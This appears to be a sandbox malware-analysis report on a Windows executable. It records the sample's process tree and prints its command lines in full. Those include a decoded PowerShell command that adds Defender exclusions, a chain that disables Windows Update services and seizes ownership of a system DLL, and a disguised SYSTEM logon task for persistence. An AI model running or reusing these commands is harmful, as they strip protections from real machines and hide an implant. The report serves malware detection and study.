Analysis
- max time kernel: 31s
- max time network: 34s
- platform: windows7_x64
- resource: win7-20230220-en
- resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
- submitted: 17-03-2023 07:57
- Static task: static1
- Behavioral task: behavioral1
- Sample: fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe
- Resource: win7-20230220-en
General
- Target: fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe
- Size: 4.3MB
- MD5: ccaffcd12dcb30adb5250f30026ecd1e
- SHA1: 4048dc71db497f641a4f35eb00ac3c163c394978
- SHA256: fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa
- SHA512: a196e58aaff3f68e15df0de667541d103c78d0f8cf114ff3f5770444de1a30b0dc46c4d0dcafbc8bd81538660d401c57dc18de8b6b3769b81cc4e8ff7f316286
- SSDEEP: 98304:w1XNI4kmUg+DgxP1Wrj3DIIs0LHhjwSKVjV3:w9NInmUg5xqX/sCHhj7K5p
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
  - Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters (reg.exe)
  - Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security (reg.exe)
-
Possible privilege escalation attempt 2 IoCs
Processes:
  - 1712 takeown.exe
  - 636 icacls.exe
-
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 2 IoCs
Processes:
  - 1712 takeown.exe
  - 636 icacls.exe
-
Drops file in System32 directory 1 IoCs
Processes:
  - File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)
-
Drops file in Program Files directory 2 IoCs
Processes:
  - File created: C:\Program Files\Windows\services.exe (conhost.exe)
  - File opened for modification: C:\Program Files\Windows\services.exe (conhost.exe)
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
  - 1992 sc.exe
  - 584 sc.exe
  - 2032 sc.exe
  - 1256 sc.exe
  - 1328 sc.exe
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry key 1 TTPs 9 IoCs
Processes:
  - 1404 reg.exe
  - 1836 reg.exe
  - 812 reg.exe
  - 1608 reg.exe
  - 1572 reg.exe
  - 932 reg.exe
  - 1536 reg.exe
  - 1840 reg.exe
  - 1296 reg.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
  - 1516 powershell.exe
  - 2044 conhost.exe
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
  - Token: SeDebugPrivilege, 1516 powershell.exe
  - Token: SeDebugPrivilege, 2044 conhost.exe
  - Token: SeTakeOwnershipPrivilege, 1712 takeown.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  - PID 1324 (fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe) wrote to memory of 2044 (conhost.exe)
  - PID 1324 (fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe) wrote to memory of 2044 (conhost.exe)
  - PID 1324 (fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe) wrote to memory of 2044 (conhost.exe)
  - PID 1324 (fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe) wrote to memory of 2044 (conhost.exe)
  - PID 2044 (conhost.exe) wrote to memory of 1988 (cmd.exe)
  - PID 2044 (conhost.exe) wrote to memory of 1988 (cmd.exe)
  - PID 2044 (conhost.exe) wrote to memory of 1988 (cmd.exe)
  - PID 1988 (cmd.exe) wrote to memory of 1516 (powershell.exe)
  - PID 1988 (cmd.exe) wrote to memory of 1516 (powershell.exe)
  - PID 1988 (cmd.exe) wrote to memory of 1516 (powershell.exe)
  - PID 2044 (conhost.exe) wrote to memory of 1796 (cmd.exe)
  - PID 2044 (conhost.exe) wrote to memory of 1796 (cmd.exe)
  - PID 2044 (conhost.exe) wrote to memory of 1796 (cmd.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1992 (sc.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1992 (sc.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1992 (sc.exe)
  - PID 1796 (cmd.exe) wrote to memory of 584 (sc.exe)
  - PID 1796 (cmd.exe) wrote to memory of 584 (sc.exe)
  - PID 1796 (cmd.exe) wrote to memory of 584 (sc.exe)
  - PID 1796 (cmd.exe) wrote to memory of 2032 (sc.exe)
  - PID 1796 (cmd.exe) wrote to memory of 2032 (sc.exe)
  - PID 1796 (cmd.exe) wrote to memory of 2032 (sc.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1256 (sc.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1256 (sc.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1256 (sc.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1328 (sc.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1328 (sc.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1328 (sc.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1608 (reg.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1608 (reg.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1608 (reg.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1572 (reg.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1572 (reg.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1572 (reg.exe)
  - PID 1796 (cmd.exe) wrote to memory of 932 (reg.exe)
  - PID 1796 (cmd.exe) wrote to memory of 932 (reg.exe)
  - PID 1796 (cmd.exe) wrote to memory of 932 (reg.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1536 (reg.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1536 (reg.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1536 (reg.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1404 (reg.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1404 (reg.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1404 (reg.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1712 (takeown.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1712 (takeown.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1712 (takeown.exe)
  - PID 1796 (cmd.exe) wrote to memory of 636 (icacls.exe)
  - PID 1796 (cmd.exe) wrote to memory of 636 (icacls.exe)
  - PID 1796 (cmd.exe) wrote to memory of 636 (icacls.exe)
  - PID 2044 (conhost.exe) wrote to memory of 1668 (cmd.exe)
  - PID 2044 (conhost.exe) wrote to memory of 1668 (cmd.exe)
  - PID 2044 (conhost.exe) wrote to memory of 1668 (cmd.exe)
  - PID 1668 (cmd.exe) wrote to memory of 1284 (schtasks.exe)
  - PID 1668 (cmd.exe) wrote to memory of 1284 (schtasks.exe)
  - PID 1668 (cmd.exe) wrote to memory of 1284 (schtasks.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1840 (reg.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1840 (reg.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1840 (reg.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1836 (reg.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1836 (reg.exe)
  - PID 1796 (cmd.exe) wrote to memory of 1836 (reg.exe)
  - PID 1796 (cmd.exe) wrote to memory of 812 (reg.exe)
  - PID 1796 (cmd.exe) wrote to memory of 812 (reg.exe)
  - PID 1796 (cmd.exe) wrote to memory of 812 (reg.exe)
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
[1] C:\Users\Admin\AppData\Local\Temp\fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe"
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\conhost.exe
      Command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe"
      - Drops file in Program Files directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAbgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBlAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZwAjAD4A"
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -EncodedCommand "PAAjAGUAbgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBlAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZwAjAD4A"
          (The -EncodedCommand argument is UTF-16LE base64 and decodes to: <#enm#> Add-MpPreference <#keh#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#ve#> -Force <#xg#>, i.e. it adds the user profile and the system drive to the Windows Defender exclusion list; the <#...#> block comments are filler.)
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\sc.exe
          Command line: sc stop UsoSvc
          - Launches sc.exe

      [4] C:\Windows\system32\sc.exe
          Command line: sc stop WaaSMedicSvc
          - Launches sc.exe

      [4] C:\Windows\system32\sc.exe
          Command line: sc stop wuauserv
          - Launches sc.exe

      [4] C:\Windows\system32\sc.exe
          Command line: sc stop bits
          - Launches sc.exe

      [4] C:\Windows\system32\sc.exe
          Command line: sc stop dosvc
          - Launches sc.exe

      [4] C:\Windows\system32\reg.exe
          Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
          - Modifies registry key

      [4] C:\Windows\system32\reg.exe
          Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
          - Modifies registry key

      [4] C:\Windows\system32\reg.exe
          Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
          - Modifies security service
          - Modifies registry key

      [4] C:\Windows\system32\reg.exe
          Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
          - Modifies registry key

      [4] C:\Windows\system32\reg.exe
          Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
          - Modifies registry key

      [4] C:\Windows\system32\takeown.exe
          Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
          - Possible privilege escalation attempt
          - Modifies file permissions
          - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\system32\icacls.exe
          Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
          - Possible privilege escalation attempt
          - Modifies file permissions

      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
          - Modifies registry key

      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
          - Modifies registry key

      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
          - Modifies registry key

      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
          - Modifies registry key

      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\schtasks.exe
          Command line: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
          - Creates scheduled task(s)

    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"

      [4] C:\Windows\system32\schtasks.exe
          Command line: schtasks /run /tn "GoogleUpdateTaskMachineQC"

[1] C:\Windows\system32\taskeng.exe
    Command line: taskeng.exe {3488D7F6-801B-4CF5-8293-44D194216BC3} S-1-5-18:NT AUTHORITY\System:Service:
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/1516-62-0x000000001B470000-0x000000001B752000-memory.dmp (Filesize 2.9MB)
- memory/1516-63-0x0000000002420000-0x0000000002428000-memory.dmp (Filesize 32KB)
- memory/1516-64-0x0000000002574000-0x0000000002577000-memory.dmp (Filesize 12KB)
- memory/1516-65-0x000000000257B000-0x00000000025B2000-memory.dmp (Filesize 220KB)
- memory/2044-54-0x0000000000160000-0x000000000057C000-memory.dmp (Filesize 4.1MB)
- memory/2044-55-0x000000001BA20000-0x000000001BE3C000-memory.dmp (Filesize 4.1MB)
- memory/2044-56-0x000000001B580000-0x000000001B600000-memory.dmp (Filesize 512KB)
- memory/2044-57-0x000000001B580000-0x000000001B600000-memory.dmp (Filesize 512KB)